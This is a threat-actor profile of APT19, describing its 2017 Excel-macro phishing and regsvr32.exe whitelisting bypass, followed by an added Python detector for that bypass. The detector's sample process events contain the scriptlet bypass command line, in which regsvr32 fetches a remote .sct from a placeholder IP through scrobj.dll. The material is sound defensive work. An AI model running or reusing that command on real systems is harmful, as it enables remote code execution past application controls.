APT19, also known as the Codoso Team, is a threat actor believed to operate with some degree of Chinese government sponsorship. The group is thought to be composed at least in part of freelancers, and it primarily targets the legal and investment sectors. It is known for deploying Cobalt Strike and its BEACON payload on compromised hosts.
In its 2017 phishing campaign, APT19 used three different techniques to try to compromise targets. Toward the end of May that year the group switched to macro-enabled Microsoft Excel (XLSM) documents as the phishing attachment. In later versions of those documents, APT19 added an application whitelisting bypass, so that the macro launched its payload through a trusted, Microsoft-signed Windows binary rather than a dropped executable. The bypass in question was the regsvr32.exe technique, which several other groups also used in 2017; APT19 employed it in its campaign against law firms that year.
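The regsvr32.exe bypass is worth a concrete detection. The following is an added example, not code from the APT19 profile or from Mandiant: it scans constructed process-creation records (a simplified key=value format, not a real Sysmon or EDR export) and flags regsvr32.exe invocations that match the widely documented scriptlet form of the bypass (the /i: argument pointing at a remote .sct and scrobj.dll as the COM scriptlet host), with extra weight when the parent is an Office process, which is what a macro-enabled XLSM lure would produce. The profile itself only states that a regsvr32.exe bypass was used; the exact command line, the sample events and the IP addresses below are assumptions made for illustration.

```python
"""Flag regsvr32.exe process creations consistent with the scriptlet-based
application whitelisting bypass, especially when spawned by Excel.

Added example for the APT19 profile, not the group's tooling or any
vendor's detection content. Log lines are constructed and simplified.
"""
import re

# Constructed sample events (one process-creation record per line).
# The "/i:<url> scrobj.dll" form is the commonly documented bypass command
# line; the profile does not state APT19's exact arguments (assumption).
SAMPLE_EVENTS = [
    'ts=2017-05-30T09:12:01Z parent="C:\\Program Files\\Microsoft Office\\Office16\\EXCEL.EXE" '
    'image="C:\\Windows\\System32\\regsvr32.exe" '
    'cmd="regsvr32.exe /s /n /u /i:http://203.0.113.10/update.sct scrobj.dll"',
    'ts=2017-05-30T09:15:44Z parent="C:\\Windows\\explorer.exe" '
    'image="C:\\Windows\\System32\\regsvr32.exe" '
    'cmd="regsvr32.exe /s C:\\Vendor\\plugin.dll"',
    'ts=2017-05-30T09:20:03Z parent="C:\\Windows\\System32\\services.exe" '
    'image="C:\\Windows\\System32\\svchost.exe" cmd="svchost.exe -k netsvcs"',
    'ts=2017-05-30T09:21:17Z parent="C:\\Windows\\System32\\cmd.exe" '
    'image="C:\\Windows\\SysWOW64\\regsvr32.exe" '
    'cmd="regsvr32 /u /s /i:https://203.0.113.10/a.sct scrobj.dll"',
    'ts=2017-05-30T09:25:50Z parent="C:\\Program Files\\Microsoft Office\\Office16\\EXCEL.EXE" '
    'image="C:\\Windows\\System32\\regsvr32.exe" '
    'cmd="regsvr32.exe /s C:\\Users\\j\\AppData\\Local\\Temp\\x.dll"',
]

# key=value pairs; quoted values may contain spaces.
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Office hosts that a macro-enabled lure would run under.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}


def parse_event(line: str) -> dict:
    """Parse one record into a dict of field name -> value."""
    return {
        m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
        for m in FIELD_RE.finditer(line)
    }


def basename(path: str) -> str:
    """Lower-cased final path component, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def regsvr32_bypass_indicators(event: dict) -> list:
    """Return the reasons an event looks like the scriptlet bypass.

    An empty list means the event is not a regsvr32 invocation or shows
    none of the indicators. Indicators are independent so that a renamed
    scriptlet or a non-Office parent still leaves something to alert on.
    """
    if basename(event.get("image", "")) != "regsvr32.exe":
        return []
    tokens = event.get("cmd", "").split()
    reasons = []
    # /i: normally passes an install string to the DLL; here it carries a
    # URL for scrobj.dll to fetch a scriptlet from.
    if any(t.lower().startswith("/i:") and "://" in t for t in tokens):
        reasons.append("remote scriptlet via /i:")
    # scrobj.dll is the COM scriptlet host the bypass abuses.
    if any(basename(t) == "scrobj.dll" for t in tokens):
        reasons.append("scrobj.dll loaded")
    # regsvr32 spawned directly by Office points at a macro.
    if basename(event.get("parent", "")) in OFFICE_PARENTS:
        reasons.append("spawned by Office process")
    return reasons


def scan(lines) -> list:
    """Return (timestamp, reasons) for every event with at least one indicator."""
    hits = []
    for line in lines:
        event = parse_event(line)
        reasons = regsvr32_bypass_indicators(event)
        if reasons:
            hits.append((event.get("ts"), reasons))
    return hits


if __name__ == "__main__":
    for ts, reasons in scan(SAMPLE_EVENTS):
        print(ts, "; ".join(reasons))
```

Running the block reports three of the five constructed events: the Excel-spawned scriptlet load (all three indicators), the same command line launched from cmd.exe (two indicators), and a plain DLL registration spawned by Excel (one indicator). The last case is the one a string match on scrobj.dll would miss, which is why the parent-process check is kept separate from the command-line checks.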
Notably, APT19's tactics resemble those of another cyber espionage group, APT32. Both groups heavily obfuscate their backdoors and scripts to evade detection; for instance, Mandiant consultants observed APT32 adding further command argument obfuscation in April 2017. The practical consequence for defenders is that detection content keyed to literal command strings ages quickly against such groups, so it needs to be backed by behavioural signals such as which processes spawn script and COM hosts.
Description last updated: 2023-12-20T16:29:27.675Z